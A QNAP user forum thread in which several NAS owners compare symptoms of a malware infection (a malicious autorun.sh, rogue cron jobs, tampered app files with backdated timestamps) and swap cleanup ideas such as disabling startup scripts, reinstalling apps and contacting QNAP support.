Where are located autorun.sh and crontab files?somy1982 wrote:Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Today I go into .qpkg folder and found many files being hacked, now I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch
Anybody know if QNAP provide a way to completely reset QTS OS and leave data unchanged?
Strange folders and cronjobs
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
- dolbyman
- Guru
- Posts: 34903
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
i've already found crontab, but i I didn't imagine to mount a ramblock for the autorun script.
Thank you
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Anybody knows the 10 second reset function, would that erase all system files?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
A bit OT: How to reinstall the operating system completely while keeping the data? Would it recognize my disks again? Since this seems to only affect the qnap system, but no data-volumes with user data, I would like to only reinstall the operating system.
There is a "restore factory defaults" but this sounds more like resetting a couple of config files and that's it. Which would leave malware files around... or does this re-install the operating system?
There is a "restore factory defaults" but this sounds more like resetting a couple of config files and that's it. Which would leave malware files around... or does this re-install the operating system?
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Same question but nobody seems to know. Better to contact QNAP, I have created a case now.robert_m_muench wrote:A bit OT: How to reinstall the operating system completely while keeping the data? Would it recognize my disks again? Since this seems to only affect the qnap system, but no data-volumes with user data, I would like to only reinstall the operating system.
There is a "restore factory defaults" but this sounds more like resetting a couple of config files and that's it. Which would leave malware files around... or does this re-install the operating system?
BTW, do you have the same symptom? did you check when the suspicious files are created?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Yes, same symptoms. My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection). I^m currently transferring my shared folders (where I have my data) to a dedicated volume to free the pool where my system is installed on. Idea is to be ready to wipe the pool and system completely. For this I will remove the other pool and take out the disks.
With all this hassle it seems to be wise to not store any data with your system. So: pool-1 = system & apps, pool-2 ff. for data.
I still don't understand exactly how the QNAP system works. There is a firmware that seems to reside on something as it's possible to get installed without any disks in the system. And a piece (the Linux system) which gets installed on the 1st volume.
With all this hassle it seems to be wise to not store any data with your system. So: pool-1 = system & apps, pool-2 ff. for data.
I still don't understand exactly how the QNAP system works. There is a firmware that seems to reside on something as it's possible to get installed without any disks in the system. And a piece (the Linux system) which gets installed on the 1st volume.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Strange this must be a known security vunderbility - given in all three cases the attacks started on 25/8, I start to wonder if some app or content distributed by QNAP caused this, as otherwise the hacker needs to know the IP of the system to hack in and that's not normally done on the same date.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Before you do the hassle, suggest you create a helpdesk ticket and see what QNAP suggests.robert_m_muench wrote:Yes, same symptoms. My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection). I^m currently transferring my shared folders (where I have my data) to a dedicated volume to free the pool where my system is installed on. Idea is to be ready to wipe the pool and system completely. For this I will remove the other pool and take out the disks.
With all this hassle it seems to be wise to not store any data with your system. So: pool-1 = system & apps, pool-2 ff. for data.
I still don't understand exactly how the QNAP system works. There is a firmware that seems to reside on something as it's possible to get installed without any disks in the system. And a piece (the Linux system) which gets installed on the 1st volume.
I was informed on Thursday that they're working on a new version of malware remover which should solve the problem.
I have important documents in a encrypted volume so I just keep them locked for now and hope there is a short cut.
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Is there a public reference to your ticket I could jump on?
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
I have a ref number but it's not public. You can create one from HelpDesk app or their website.robert_m_muench wrote:Is there a public reference to your ticket I could jump on?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
I think I'm going to install osquery.io and regularly run specific security queries like this set https://github.com/palantir/osquery-con ... otkit.conf
@qnap (if they are listening): IMO such a feature should go directly into the firmware.
@qnap (if they are listening): IMO such a feature should go directly into the firmware.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Indeed. The autorun.sh script that I decrypted contains some commands that modify some QNAP configuration and program files, and then change the modification date back in time to make it look that they are not modified.robert_m_muench wrote:My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection).
Also, the August 25 date may not necessarily be the date the malware was installed. It could be the date the malware was created/built. This is just speculation, I have no means to verify.
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Here is a Reddit link about the same topic and how QNAP handles such situations:
https://www.reddit.com/r/qnap/comments/ ... formation/
https://www.reddit.com/r/qnap/comments/ ... formation/
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Thanks for the link!robert_m_muench wrote:Here is a Reddit link about the same topic and how QNAP handles such situations:
https://www.reddit.com/r/qnap/comments/ ... formation/
I'm afraid this one we have now is not something fully recognised by malware remover.
The malware remover did found some threats on 26/8 when it was first run after the files were created on 25/8, so I believe 25/8 is the time when it started.
However I checked the files being recovered (I can see the timestamp they were changed when malware remover was scheduled to run on 26/8), however when I check the content of the files I still found the strange encrypted segments, so I delete the apps and install them again. This is all I can fix, I don't know how many system files/conf have been compromised, and I have no way to verify that.
Clearly the malware was produced to attach QNAP devices by using some security vulnerability of QTS (or its apps). QNAP owes us an explanation, and they should help us to solve the problem. I suggest everybody who is impacted create a help desk ticket, and update here in this thread.